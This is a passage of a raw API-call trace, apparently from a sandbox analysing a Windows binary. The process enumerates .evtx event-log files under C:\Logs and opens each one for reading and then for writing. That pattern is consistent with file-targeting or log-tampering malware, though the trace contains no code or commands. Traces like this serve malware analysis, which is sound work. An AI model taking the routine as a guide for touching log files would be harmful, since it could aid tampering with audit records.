hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0086.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0086.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.960] AreFileApisANSI () returned 1 [0086.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0086.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e828 [0086.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6e828, cchWideChar=62 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 62 [0086.960] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0086.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0086.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.960] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cAlternateFileName="MID067~1.EVT")) returned 1 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0086.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0086.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0086.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.962] AreFileApisANSI () returned 1 [0086.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", lpUsedDefaultChar=0x0) returned 60 [0086.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0086.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0086.962] AreFileApisANSI () returned 1 [0086.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0086.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0086.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 60 [0086.962] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.962] GetFileType (hFile=0x424) returned 0x1 [0086.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0086.963] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.963] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.963] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.963] CloseHandle (hObject=0x424) returned 1 [0086.963] AreFileApisANSI () returned 1 [0086.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0086.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0086.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 60 [0086.963] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.963] GetFileType (hFile=0x424) returned 0x1 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.964] CloseHandle (hObject=0x424) returned 1 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.964] AreFileApisANSI () returned 1 [0086.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0086.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0086.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 60 [0086.964] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.965] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cAlternateFileName="MIDE4D~1.EVT")) returned 1 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.966] AreFileApisANSI () returned 1 [0086.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpUsedDefaultChar=0x0) returned 51 [0086.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0086.966] AreFileApisANSI () returned 1 [0086.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0086.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x463c8 [0086.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x463c8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 51 [0086.966] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.967] GetFileType (hFile=0x424) returned 0x1 [0086.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.967] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.967] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.967] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.967] CloseHandle (hObject=0x424) returned 1 [0086.967] AreFileApisANSI () returned 1 [0086.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0086.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x466d8 [0086.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 51 [0086.967] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.968] GetFileType (hFile=0x424) returned 0x1 [0086.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0086.968] CloseHandle (hObject=0x424) returned 1 [0086.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0086.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0086.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0086.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0086.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.969] AreFileApisANSI () returned 1 [0086.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, 